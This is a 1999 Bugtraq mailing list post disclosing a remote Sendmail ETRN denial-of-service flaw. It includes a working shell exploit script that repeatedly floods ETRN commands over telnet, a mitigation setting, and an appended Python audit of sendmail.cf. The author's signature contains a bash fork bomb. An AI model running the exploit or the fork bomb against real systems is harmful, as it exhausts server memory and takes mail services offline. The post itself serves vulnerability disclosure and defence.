Bugtraq mailing list archives

Re: procmail / Sendmail - five bugs


From: lcamtuf () IDS PL (Michal Zalewski)
Date: Wed, 22 Dec 1999 22:22:12 +0100


On Tue, 21 Dec 1999, Rob Jones wrote:

> with or without these double-quotes the message is immediately dropped
> on redhat linux with the message

Oops! Yes, apparently this problem affects all versions of Sendmail, but
only with a .cf file left over from 8.8.x or previous releases. In fact,
obsolete .cf files are quite common if Sendmail has been updated by the
administrator - 'by hand' or from binary packages like .rpm - as people
have not enough time and good will to rebuild config files when replacing
the binary (especially if there are some extensions/custom .cf settings).

So, another thing. There's a nice remote Sendmail ETRN DoS. When the ETRN
command is read by Sendmail (it shouldn't be allowed at all, IMHO), it
calls fork(). The parent process generates no output - only child-generated
output is sent, so the parent won't be notified of a send()/write() failure.
If we drop the connection (after sending a lot of ETRNs), the parent process
will get stuck, doing repeatedly fork() ... sleep(5), till the end of the
ETRNs read into the input buffer is reached. This allows us to spawn any
amount of 'unusable' sendmail children, hanging for a long period of time -
and it can be done using low network bandwidth and resources. Direct result
- all server memory consumed (causing Linux 2.0 kernels to crash with
messages like 'no memory for sendmail', 'no memory for klogd' etc). Unlike
connect() flooding, this attack generates low traffic, only one connection
at a time, and seems to be deadly harmful, unless something like:

# maximum number of children we allow at one time
O MaxDaemonChildren=15

is defined in sendmail.cf (as far as I recall, this option is disabled by
default). The exploit follows (written for its beautiful name):

-- gurghfrbl.sh --
#!/bin/sh

TARGET=localhost
COUNT=150        # ETRN commands sent per connection
SLEEP=1          # seconds to keep each connection open before dropping it

echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"

while :; do
  echo -n "."
  (
    # feed COUNT ETRN commands down one connection, then let it drop
    NIC=0
    while [ "$NIC" -lt "$COUNT" ]; do
      echo "ETRN x"
      NIC=$((NIC + 1))
    done
  ) | telnet $TARGET 25 >/dev/null 2>&1 &
  sleep $SLEEP
  killall -9 telnet >/dev/null 2>&1
done
-- EOF --
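As an added illustration (not part of the original post, nor sendmail's own tooling), a small Python audit that parses long-form `O Name=Value` option lines from a sendmail.cf and reports whether a MaxDaemonChildren limit is actually in force, treating a commented-out `#O` line and a value of 0 as "no limit". The .cf fragment is constructed for the example, and reading the leading `V<n>/...` line as the config version level is an assumption of this script, not something the post states.

```python
import re

# Constructed sendmail.cf fragment for this example (not from the post).
SAMPLE_CF = """\
V8/Berkeley
O QueueDirectory=/var/spool/mqueue
# maximum number of children we allow at one time
#O MaxDaemonChildren=15
"""

# Long-form option line: "O Name=Value" (whitespace around '=' tolerated).
OPTION_RE = re.compile(r"^O\s+([A-Za-z]+)\s*=\s*(.*?)\s*$")


def parse_options(cf_text):
    """Return {name: value} for 'O Name=Value' lines; '#O ...' lines are
    comments and therefore leave the option at its compiled-in default."""
    options = {}
    for line in cf_text.splitlines():
        m = OPTION_RE.match(line)
        if m:
            options[m.group(1)] = m.group(2)
    return options


def config_version(cf_text):
    """Return the numeric level from the 'V<n>/...' line, or None (assumed layout)."""
    for line in cf_text.splitlines():
        m = re.match(r"^V(\d+)", line)
        if m:
            return int(m.group(1))
    return None


def audit_child_limit(cf_text):
    """Return (in_force, limit): limit is None when the option is absent or
    commented out; a limit of 0 is explicitly unlimited, so not in force."""
    raw = parse_options(cf_text).get("MaxDaemonChildren")
    if raw is None:
        return (False, None)
    try:
        limit = int(raw)
    except ValueError:
        return (False, None)
    return (limit > 0, limit)


if __name__ == "__main__":
    in_force, limit = audit_child_limit(SAMPLE_CF)
    print("config version level:", config_version(SAMPLE_CF))
    print("MaxDaemonChildren in force:", in_force, "limit:", limit)
```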

_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 501 4000 69]
To iterate is human, to recurse divine [P. Deutsch]
